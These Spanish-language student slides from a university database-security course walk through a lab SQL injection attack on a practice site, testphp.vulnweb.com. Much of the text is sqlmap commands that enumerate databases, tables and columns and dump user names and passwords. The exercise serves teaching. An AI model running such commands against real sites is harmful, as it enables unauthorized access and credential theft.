ataque sql web
TRANSCRIPT
Universidad Nacional Abierta y a Distancia (UNAD)
SEGURIDAD EN BASES DE DATOS
Ataque con inyección de código SQL a sitio web Grupo 233009_17
INTRODUCCIÓN
• Un sistema de protección deberá tener la flexibilidad suficiente para poder imponer una diversidad de políticas y mecanismos.
• Los ataques a las páginas web y las bases de datos son un tema critico de filtrado de información para cada organización, por ello debemos conocer cómo se realizan y su fin para así proteger y salvaguardar la información.
OBJETIVOS
• Realizar ataque por inyección de código SQL a un sitio Web.
• Identificar los posibles ataques a los cuales se puede exponer un sistema de información.
• Conocer técnicas para detectar los posibles ataques a los sistemas de información
DESARROLLO DE LA ACTIVIDAD
Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com , con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
Lo primero que debemos es definir de qué modo se realizará el ataque, ya sea por sistema operativo Linux o por Microsoft. Para este caso se realizará con Microsoft.
Luego de definir el sistema para el ataque se procede a descargar un programa para realizar ataque por inyección de código SQL se sugiere SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el programa Pyntos
Una vez descargados se necesita que la carpeta comprimida de sqlmap sea instalada en el mismo lado o unidad como se observa en la imagen.
Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando el apostrofo ‘ al final de url. Url a validar: http://testphp.vulnweb.com
Una vez analizada y verificado el posible ataque a realizar, procedemos a ubicarnos en por línea de comandos en la carpeta sqlmap con el comando
cd .., de la siguiente manera:
Y una vez ubicados en la carpeta sqlmap, comenzamos con la ejecución de comando.
Ejecución de comando para averiguar nombre de la base de datos:
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –dbs
Ejecución de comando: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db ;para extraer información de la base de datos
Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
Comando para extraer las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns
Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
Comando para validar password: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump
FUENTES
• http://datateca.unad.edu.co/contenidos/233009/Guia_de_componente_practico.pdf
• http://www.slideee.com/slide/ataque-por-inyeccion-de-codigo-sql-y-sniffing
• https://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M